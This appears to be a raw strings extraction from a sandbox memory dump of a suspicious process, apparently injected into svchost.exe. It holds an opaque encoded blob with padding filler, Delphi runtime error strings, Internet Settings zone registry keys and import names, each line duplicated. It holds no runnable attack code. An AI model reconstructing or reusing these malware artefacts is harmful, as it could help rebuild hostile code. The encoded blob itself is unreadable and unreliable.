pb1WiVNYc4ZDnnIO8n9pcIBTmDKCuxljCn1IObMRS1Hx6Ou2EqvxsWhJgWst6V9PDM/QrCxX43hIe/Vgp0G971Qn2BpZP8cU1qvouvmC60GK7GqJYJhxIFziUqwFKrAGAFKRBumb1NEeZdxpHbe3Zvs01cE0a5KsqDN7Ap7xS1fm fDJPi79zXzOW7kkeQ59eM0hmso33wqe5lYti6bLHTvf9bBA67ljQzttgsnSHsG5MtfyEhdPTkS9ePfM7Q59T05luA5y1KlpcxY6yBc0VQhVAgG6tLeA4HPUkNts QdYPIXYswl/Dgns6ET7RjGfSy5jakzU3CIQDB3y6RIQXSzNrYPcd4QPfDMYN8pHCd9FWNBGcBDa6FPSaRljyYp9bEQwuPGPt6dWDSj3cwzF1UkmlysJvFIrsQ1YEHgUE38LO48mxRmeE6ZQDvlGMkhpywQJmu4e5vAkFoal7/ywz1g1WRRYDy7eS 33yhcbrXj5E3bvuqSjY jMrKMciNRhlkBzAZdMg1pCFZz41rUH epbJO3s5tiXayssXHT5DjihwM5CmlJI3OuJ1kZeqpPoJyZFgFBfGWxu5GmEupyxPwg1 833ILD4f6CXBKFWWJ9JwujqhvdgQK0OBIIrNhKrk8SA3X2l4451P974Vyvko2xSnZrPpvPSqKjjKT8Gsw nzWVSaPLDDBCt2OvVaDwSi2bPfPJcF20io1M/ uPHMFpIrkuH0cNqSEpUhI/vLddNDoNrMe2mfENdq6vK7vxlujmm8dEtgtzcnF03HNeM EA3czdIr0pylvmaQGDqOXf4MdLgoudWzTwEwMZTkjqrdB94a2qsalNOnlObnpaAQjddW6TnlfZ7DQ84Gxk0fdtTa0Dbj62rS6NvKVw4JRpOzeyOIcus30tdMfpOyqjK1KWX6dgL iGzrKS9SD30q6JuYZPrwlqffR5mWrV1M7eKA9oaw61X4xVCv4P85UWnK6wGINqGMB7Ttci1etNFgCBLqZ28Zmihmzdt7MYbmvoPLJo GgnbHxKTD2DevgtEF2jxS9byvrb fZHiAGfyOv3Wf/bFqXPkhXyuOQjWZ9tJ5zNiR70rLADHsEfifApUdCmOLQimQj6df4jgsH9ENqDlOKSr7RcXRYPzW30Zse0Qmdb8AXvpb1JAdPT73NRfUjiuBAPvRvhJARW4En3Q1Icr8cEFtRHOsLx1KfmvWM6 Gcsb5fezmKFLGNn/UQav7AAd4v78N2lbZ4CVOh7Xe55fc2CbxgxgEDQuF1/gSCnvTtYtwd2M4B/Ding6ZZa9U2MlMtcnt7HN 1hPZM Ux4B3n3nidCgztYEvlyKy30tdWFPhrTym9ECv3EfANPRAH5Z13O2R5SkGo7EGKpcB9SbPIJXzmtXwTcFjxxLx3zj1yu XYzCWbBCzPTJur9GIdRbEA0mI8xDU6F8noLfUwfrnvvGM5TXjOL r7JDTfGnWOGan NR0/ThvFkhVHQ7yC0t31OQtj9Hcq6AmbQlCAmY5XJpBOnmTPco3hO8uqHOjllv3ZP927jDYlYZvxBTQ7hLJcZNbfUohzHM/Mgt6y Hf11N7dNlCIgS d9iKR035oLCyf25xkIn5m9dEdBuFvlXiSwJ8MOIHXDtxG3IHerUQQ22xDpUfg5u1zrc4jGXJE4g8lFs3 gAMFa1wD89AGezWUcVhA2kUX6pDjOCv33McDLf7n/d/oHwuwl5S2q4XGLhyfFNs T3z1bFyy7MHiFt1Tolp0GwRDXYlPH5CD8W7EIqNXwjKNYh0kTezf8f4MjaAGDwaNSDfclIpOU4ZpT ccqWxFoeqvgCsWKsMyWSlLO2aEIICQWXEk0NTbbC0wVZkIDy XmYvpAa5H3XXZU3YDuYsmOpT7f2DlSj8GUXUUWsj8goRbNoyjcuie6OlPpWyo3vQdy/ORmdRUZJ3Q1gkSTUrhSK6lOJImAn5phb3qro WQoccDOBM/cyNBj7MA2Oz0d qVaPiNsAooUIMdb2v3BWUr9rQCUUTOOlyu9kUYix4aPGNTp lmD3M lWDHvCS1YspQK3jj6JrrIzjS8hovpXk1VM32Kuy7HIWphH gUg04W10YQE 1vOWBCBYuNC0wxIJCxRrXdGe/MdUnwYrq5DBjLazUwmUDm7a1OvTt8gjg3qWHBHJMyjjBwXyxbRWb9Iv F98VAZDZX61L2OhbMdkVk X1pdbV0faBN3gFoRR/gp31CpMIJGqTqqxzHl PmhoqEOwVOInMh9FAM5DS8LC3CxGxZZK9oZZonnFALAOUmhocV7oQT/lmPBt0NrS12yRaaqdSxuqyLLAz8P2ebqz3P8cUaaxU6/R0IdzDLGNi1tCZSeXy5qoJKHCDjJOuzJL6jNPlLNiKF4nhNUbGIqkcR1bXgkCs8UCrQtvyGgbQkLcxmX7k4f KGo28pwD2qwlOAt2OIktOV1bwijm2qmZT2chywyMYGgX2UC6KN3zN1vShO9WcJhHo2ZiriX4d6l0sHNnnreaH7nbidheScoYCdKgeu KC218FnYGmldHBeyQGbJId4itioBO8qM6D8ZSPEWyT/kV8yRbRRZUNTPrfAs636MA3plxT21/eazTnTcYQ0fgRHtEc6blERNiA5dOZhqpfaBvlRklfn4o3Jztvao6On51RR9W1apk3cGUc2kv1TqT5BQYZZ6PSaxMMs7bxLjwdceVWRlyCBf7X0cIs9KzqTEKDKTLBeHSngPLRXu8yj0mZuYkULBsPGf5004LwZ0yDBrt4DnQs90VN8H9p/7aVJ4zW Fp5vSYZs3Hg TmntT6Ui9loHvaShGmx9Li4zhJjLd57p kb7 bGijQCP1Vo74sI8NyI9Kq0Y7nT0lqyQ6OEXld9Xs1KvJeA1moykaTVHtOK 7nhFZXrl4uDJw/EjEHvzYgicXVynGRHnH6dY/eUYHztU3Xa6auo7UakTnYboq5SQhrR2q4FiH0S6qFWe/usej4FTrEz/kfc/UB7DK8GKiwtYiocDZS71nLEk6BHKu5cGAsQ1rdPJvVrAG1fn Be1KOQ9CML4bvKzr B5rHo50A8lHpZEpzrQGE70xxnzrBw9oEtFr5hixcA1UkE8mZ6TxuEO97ZrHvaYhEPQROc7NFYLfvN4Ls Xo9fwhliBIEPlvOW6CFC7gCxaCQGxrg3qMLC0pyxKmXBAn1XVZ/sWNSeVhppuPNSk6dka7SVd V C06jg1DhrP9NvLtslNktXE qQxC5mFlZBjN9KSZmjNTwa 4ODdDVT6l87kOCyfaw/fYnqR/ jZKaTJNNqSjV/X Jf9tLWnLrnoe 2QwnSsHKhoRGKISt0cBUsXItPbYBY2AIxIOTji6nmyD1AFBU7G /DZGvDfDUxeTMpYpxZ1 BXDJHkTzq5McwQjfUCv7Z9D7nTqyj z/3l0nLyOsZIqm/9katu3rjlxAdNTZgEx/Zc0AIufCNZVbUHrxenFfvl9eUEByjTgazOYiIn4cR YdUBCpuYbmtUMH1vN0FIaZC/JWYHy55vYixDN402Ci5/vflQa6SHZFboiprMdVzjpUwCjVUz1lV/WH2IHje/SGys9//aznjD16aH8M1LYfnmsfU50ZcAT3AskGeF4Hn Dq2PhFcniFgFniWLsQTPqacsSRuU2fT5fENBrZ02ybC5hTPZkVOldfUcoQC 6jFKNtvLisdViqnEn6ql0WsNCeRTA6QtwPh50ZJVYcw9iRNgwy09r4Ieu0rcl9r2QvZ K8v4Hhb5iGRlEY0sOj2rM54ZdDDO52xOJ5Hdht7NkFQet0CkL 8kVpUuNiYQfatX/wE6AHBZ/qlaGQLPAuxcQrR4yxc7ND6Uo6Qu26QAPLUPKJVXdeK0ZQ6AuFYCC Gksj5BSLrfTYvhGd2Y0P82eTgUzkBm6AkeVVQ/cpT xTC5w6jKde/sVn07 K/T/W 9ufdvqkYwM1adGHOUhyATQBwCGzJC4H8YtF/YZ/YC3olBlKuY8iHfjY16F6Udm/YWZ x7uWJLT7BuDMGOcxrskcVrV7iYeTH6uK2BwOTPbCFcN4iKwYZKvGoVC8B7SOfbmWT5bEKmLo1R3H0YvYKuP2x9n6YCrszz2TZKbg1m2ugxneto/5ZM8dTsE4ivOkllpOYcnflTY3oBqqAwpuRth0UrPyDzGwn9Z/J3KUrWgSGnqSEAm4Txx7YhUdawT6rBs=KQdZsrD1QhacXmQpPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGX2
GcAQm81TXQ20gBQBfGzUUyITkVnuf6ZokztbVCBoXIkLEXZuX3K6Tq/kMmlUSJN5i4798 S07ThYVRcJlJzpssn8BeOAKxFAmxN1MmvqgFTEd8SeXkAI50Nm08Mdi1T794hz4w RqId TNhNtQGZ30DN sUxW8YTlNLHogIsZXdA3r0LqgrlFbvfeObL1d ABivgHLbuDjQUpeVdLeaduvmWAagE0ADmxsx0sqM50BuHv3pWRY5/ptsKVVf6AkKuMd7r6G Fj4ZXmY4m0RqIsfGJ9u3IqMibLkaZwIl8GKsFspvb wvDHgg0u6VI mDwAQ0LUOD7qwXiwAlBmlLTXTE4vCd7wHU0H/ouUKmbCrNoF 0tlR3keUXDn0NID1CuTV 53fQ3miPeMTKaw5qHOnV6Wq jpi5l6v/dmzxRVWC5Cff9Qebg6XJjREK4oUBaJd2pRVdeUiMuyoAc/3zyuLJfRuT 58D9KIKr v1pVPO81nj1MDj6FSQYrf54kItfRGMeGKEqrp2KW6jP8/UREYrqhYcv4pFx6wahmeWsOeKEh8xC4KdtQ3Xw7tj5P971uHekfA1YhlG2V4wabNQi44CjtQ2qPxnmupnPpaUBY51 VANO8XEgrQ76/8PXTaE8jnOa3orrrE3zQJj9gdxUs QeFaWK nlsitcqZpl2SV4OaAHOUqa1STXYhCBQkdiG31TIywBxkxDBThzdrfrH5aI0WPgLZt7keh2WNsh4kNsYW1Ww6faxrtnHmfDBj9FXN31Qur2/RJroZYq9Sie3TC3IUXAnQLSnhAgXmDJfkzW4o/MGSDQo//LAj1RHUgp0WEzhOv5Ys1Hp1L7Ns kK2fuf4fJauYssZYdDBQd Jgd/xxzUOc2CiqnO DwwwG13y9PLBG1cRQozcwiHRPRV2eISfVXBgcj2Zj6D8YGiVzoScCI8 V wdNkhhBObIJQJyEcuzOYHu4lIZVKE0zWpMuN76N55TXtv9DKaBnfYz1EiDjo9eOf vtK2vzuGFWtb9M1HpuvertQtKHirxnsrPSLYBEejLt0BS1vtcXqnX7AXXCIizI/YycVNmyCWjUFtwPa5w2RI97w5wmx0pt8gqJvTm8zlRjUkavyJ7EVJZeTqDJtDir8aRJ3WTWzPfGizYxZM2uv/Aj437fW3xQfcmNXsfa6XqD2JII 8tiVEftxyWMzKaBktW/HwySeUxuU7AN gQtTpprzTnvVTr8PmWTao7eTUStsJ1vKIz5ZVXzUtzU4T1hG//GXgs1MIumW2irhAnMhExLvKEJucnazTprqmMDUuoMOZSLXv/U6QHABgGGIXHvtq0jBdl/1vj0vHf3XmI2jQc13qIS6ZYP z7H/XtMhVd3Ndz Or26Z4oWY oweJzP/Oa3l1ayVXaIYs3K7QoHt5vakSB4XJ9LXmctV01bUM/4jSuY5O7az8 u9BVRJ4Q4pCRU 82fVtZTIo7iy8zyrdx7St9QSadSLOX/UxqYVbEFG4OKrj6lUfoMm35az8Td19uSQNn8kVVfYJre60OmxhzJrF2tFOd Mbx7s5jcO1aL4 QuO6h0m 7zuT80TUeapOGmY4s3q4TCtJ88oX6leNS5n645pHAOpcUh7KX6oKol6y6fMNpWZpxMiUL8tnQIdsMZ93oWkhUAlyD6/wDi/y3YhLJdzxFrqSdDf7yNdNOmBQrVLnPLQIbAHi3EKhLsbWb8huds2y34ScNd0BHS0G2G4wJRby7adZ5kQD80QH0ZWNSsTjiQT8vMLNGIKk020fO5wQNsMlQlamhN04gdsLkhjKYMID0YvGGOC2PB5X8WtfOxhf6DTH0E/adetexYzVc9b0xieJw0PNJIwznajHmkrJBiI1aGBr1uU9QgbsbNVtgkFy4Qd4bqz71ZF1CT9ODQEo3NakWUrGGw3w9kCb/9ztCaZqVm4gzGJ7WUAY1EYSl9mm5xeFauRQkurR7tEIU X pb1WiVNYc4ZDnnIO8n9pcIBTmDKCuxljCn1IObMRS1Hx6Ou2EqvxsWhJgWst6V9PDM/QrCxX43hIe/Vgp0G971Qn2BpZP8cU1qvouvmC60GK7GqJYJhxIFziUqwFKrAGAFKRBumb1NEeZdxpHbe3Zvs01cE0a5KsqDN7Ap7xS1fm fDJPi79zXzOW7kkeQ59eM0hmso33wqe5lYti6bLHTvf9bBA67ljQzttgsnSHsG5MtfyEhdPTkS9ePfM7Q59T05luA5y1KlpcxY6yBc0VQhVAgG6tLeA4HPUkNts QdYPIXYswl/Dgns6ET7RjGfSy5jakzU3CIQDB3y6RIQXSzNrYPcd4QPfDMYN8pHCd9FWNBGcBDa6FPSaRljyYp9bEQwuPGPt6dWDSj3cwzF1UkmlysJvFIrsQ1YEHgUE38LO48mxRmeE6ZQDvlGMkhpywQJmu4e5vAkFoal7/ywz1g1WRRYDy7eS 33yhcbrXj5E3bvuqSjY jMrKMciNRhlkBzAZdMg1pCFZz41rUH epbJO3s5tiXayssXHT5DjihwM5CmlJI3OuJ1kZeqpPoJyZFgFBfGWxu5GmEupyxPwg1 833ILD4f6CXBKFWWJ9JwujqhvdgQK0OBIIrNhKrk8SA3X2l4451P974Vyvko2xSnZrPpvPSqKjjKT8Gsw nzWVSaPLDDBCt2OvVaDwSi2bPfPJcF20io1M/ uPHMFpIrkuH0cNqSEpUhI/vLddNDoNrMe2mfENdq6vK7vxlujmm8dEtgtzcnF03HNeM EA3czdIr0pylvmaQGDqOXf4MdLgoudWzTwEwMZTkjqrdB94a2qsalNOnlObnpaAQjddW6TnlfZ7DQ84Gxk0fdtTa0Dbj62rS6NvKVw4JRpOzeyOIcus30tdMfpOyqjK1KWX6dgL iGzrKS9SD30q6JuYZPrwlqffR5mWrV1M7eKA9oaw61X4xVCv4P85UWnK6wGINqGMB7Ttci1etNFgCBLqZ28Zmihmzdt7MYbmvoPLJo GgnbHxKTD2DevgtEF2jxS9byvrb fZHiAGfyOv3Wf/bFqXPkhXyuOQjWZ9tJ5zNiR70rLADHsEfifApUdCmOLQimQj6df4jgsH9ENqDlOKSr7RcXRYPzW30Zse0Qmdb8AXvpb1JAdPT73NRfUjiuBAPvRvhJARW4En3Q1Icr8cEFtRHOsLx1KfmvWM6 Gcsb5fezmKFLGNn/UQav7AAd4v78N2lbZ4CVOh7Xe55fc2CbxgxgEDQuF1/gSCnvTtYtwd2M4B/Ding6ZZa9U2MlMtcnt7HN 1hPZM Ux4B3n3nidCgztYEvlyKy30tdWFPhrTym9ECv3EfANPRAH5Z13O2R5SkGo7EGKpcB9SbPIJXzmtXwTcFjxxLx3zj1yu XYzCWbBCzPTJur9GIdRbEA0mI8xDU6F8noLfUwfrnvvGM5TXjOL r7JDTfGnWOGan NR0/ThvFkhVHQ7yC0t31OQtj9Hcq6AmbQlCAmY5XJpBOnmTPco3hO8uqHOjllv3ZP927jDYlYZvxBTQ7hLJcZNbfUohzHM/Mgt6y Hf11N7dNlCIgS d9iKR035oLCyf25xkIn5m9dEdBuFvlXiSwJ8MOIHXDtxG3IHerUQQ22xDpUfg5u1zrc4jGXJE4g8lFs3 gAMFa1wD89AGezWUcVhA2kUX6pDjOCv33McDLf7n/d/oHwuwl5S2q4XGLhyfFNs T3z1bFyy7MHiFt1Tolp0GwRDXYlPH5CD8W7EIqNXwjKNYh0kTezf8f4MjaAGDwaNSDfclIpOU4ZpT ccqWxFoeqvgCsWKsMyWSlLO2aEIICQWXEk0NTbbC0wVZkIDy XmYvpAa5H3XXZU3YDuYsmOpT7f2DlSj8GUXUUWsj8goRbNoyjcuie6OlPpWyo3vQdy/ORmdRUZJ3Q1gkSTUrhSK6lOJImAn5phb3qro WQoccDOBM/cyNBj7MA2Oz0d qVaPiNsAooUIMdb2v3BWUr9rQCUUTOOlyu9kUYix4aPGNTp lmD3M lWDHvCS1YspQK3jj6JrrIzjS8hovpXk1VM32Kuy7HIWphH gUg04W10YQE 1vOWBCBYuNC0wxIJCxRrXdGe/MdUnwYrq5DBjLazUwmUDm7a1OvTt8gjg3qWHBHJMyjjBwXyxbRWb9Iv F98VAZDZX61L2OhbMdkVk X1pdbV0faBN3gFoRR/gp31CpMIJGqTqqxzHl PmhoqEOwVOInMh9FAM5DS8LC3CxGxZZK9oZZonnFALAOUmhocV7oQT/lmPBt0NrS12yRaaqdSxuqyLLAz8P2ebqz3P8cUaaxU6/R0IdzDLGNi1tCZSeXy5qoJKHCDjJOuzJL6jNPlLNiKF4nhNUbGIqkcR1bXgkCs8UCrQtvyGgbQkLcxmX7k4f KGo28pwD2qwlOAt2OIktOV1bwijm2qmZT2chywyMYGgX2UC6KN3zN1vShO9WcJhHo2ZiriX4d6l0sHNnnreaH7nbidheScoYCdKgeu KC218FnYGmldHBeyQGbJId4itioBO8qM6D8ZSPEWyT/kV8yRbRRZUNTPrfAs636MA3plxT21/eazTnTcYQ0fgRHtEc6blERNiA5dOZhqpfaBvlRklfn4o3Jztvao6On51RR9W1apk3cGUc2kv1TqT5BQYZZ6PSaxMMs7bxLjwdceVWRlyCBf7X0cIs9KzqTEKDKTLBeHSngPLRXu8yj0mZuYkULBsPGf5004LwZ0yDBrt4DnQs90VN8H9p/7aVJ4zW Fp5vSYZs3Hg TmntT6Ui9loHvaShGmx9Li4zhJjLd57p kb7 bGijQCP1Vo74sI8NyI9Kq0Y7nT0lqyQ6OEXld9Xs1KvJeA1moykaTVHtOK 7nhFZXrl4uDJw/EjEHvzYgicXVynGRHnH6dY/eUYHztU3Xa6auo7UakTnYboq5SQhrR2q4FiH0S6qFWe/usej4FTrEz/kfc/UB7DK8GKiwtYiocDZS71nLEk6BHKu5cGAsQ1rdPJvVrAG1fn Be1KOQ9CML4bvKzr B5rHo50A8lHpZEpzrQGE70xxnzrBw9oEtFr5hixcA1UkE8mZ6TxuEO97ZrHvaYhEPQROc7NFYLfvN4Ls Xo9fwhliBIEPlvOW6CFC7gCxaCQGxrg3qMLC0pyxKmXBAn1XVZ/sWNSeVhppuPNSk6dka7SVd V C06jg1DhrP9NvLtslNktXE qQxC5mFlZBjN9KSZmjNTwa 4ODdDVT6l87kOCyfaw/fYnqR/ jZKaTJNNqSjV/X Jf9tLWnLrnoe 2QwnSsHKhoRGKISt0cBUsXItPbYBY2AIxIOTji6nmyD1AFBU7G /DZGvDfDUxeTMpYpxZ1 BXDJHkTzq5McwQjfUCv7Z9D7nTqyj z/3l0nLyOsZIqm/9katu3rjlxAdNTZgEx/Zc0AIufCNZVbUHrxenFfvl9eUEByjTgazOYiIn4cR YdUBCpuYbmtUMH1vN0FIaZC/JWYHy55vYixDN402Ci5/vflQa6SHZFboiprMdVzjpUwCjVUz1lV/WH2IHje/SGys9//aznjD16aH8M1LYfnmsfU50ZcAT3AskGeF4Hn Dq2PhFcniFgFniWLsQTPqacsSRuU2fT5fENBrZ02ybC5hTPZkVOldfUcoQC 6jFKNtvLisdViqnEn6ql0WsNCeRTA6QtwPh50ZJVYcw9iRNgwy09r4Ieu0rcl9r2QvZ K8v4Hhb5iGRlEY0sOj2rM54ZdDDO52xOJ5Hdht7NkFQet0CkL 8kVpUuNiYQfatX/wE6AHBZ/qlaGQLPAuxcQrR4yxc7ND6Uo6Qu26QAPLUPKJVXdeK0ZQ6AuFYCC Gksj5BSLrfTYvhGd2Y0P82eTgUzkBm6AkeVVQ/cpT xTC5w6jKde/sVn07 K/T/W 9ufdvqkYwM1adGHOUhyATQBwCGzJC4H8YtF/YZ/YC3olBlKuY8iHfjY16F6Udm/YWZ x7uWJLT7BuDMGOcxrskcVrV7iYeTH6uK2BwOTPbCFcN4iKwYZKvGoVC8B7SOfbmWT5bEKmLo1R3H0YvYKuP2x9n6YCrszz2TZKbg1m2ugxneto/5ZM8dTsE4ivOkllpOYcnflTY3oBqqAwpuRth0UrPyDzGwn9Z/J3KUrWgSGnqSEAm4Txx7YhUdawT6rBs=KQdZsrD1QhacXmQpPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGX2
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
66006666
66006666
.Method '%s' not supported by automation object/Variant does not reference an automation object
.Method '%s' not supported by automation object/Variant does not reference an automation object
External exception %x
External exception %x
Interface not supported
Interface not supported
%s (%s, line %d)
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
Invalid pointer operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction%Exception %s in module %s at %p.
Privileged instruction%Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'
No argument for format '%s'
Invalid variant operation"Variant method calls not supported
Invalid variant operation"Variant method calls not supported
I/O error %d
I/O error %d
Integer overflow Invalid floating point operation
Integer overflow Invalid floating point operation
svchost.exe_932_rwx_01000000_00006000:
.text
.text
`.data
`.data
.rsrc
.rsrc
ADVAPI32.dll
ADVAPI32.dll
KERNEL32.dll
KERNEL32.dll
NTDLL.DLL
NTDLL.DLL
RPCRT4.dll
RPCRT4.dll
NETAPI32.dll
NETAPI32.dll
ole32.dll
ole32.dll
ntdll.dll
ntdll.dll
RegCloseKey
RegCloseKey
RegOpenKeyExW
RegOpenKeyExW
GetProcessHeap
GetProcessHeap
NtOpenKey
NtOpenKey
svchost.pdb
svchost.pdb
\PIPE\
\PIPE\
Software\Microsoft\Windows NT\CurrentVersion\Svchost
Software\Microsoft\Windows NT\CurrentVersion\Svchost
\Registry\Machine\System\CurrentControlSet\Control\SecurePipeServers\
\Registry\Machine\System\CurrentControlSet\Control\SecurePipeServers\
5.1.2600.5512 (xpsp.080413-2111)
5.1.2600.5512 (xpsp.080413-2111)
svchost.exe
svchost.exe
Windows
Windows
Operating System
Operating System
5.1.2600.5512
5.1.2600.5512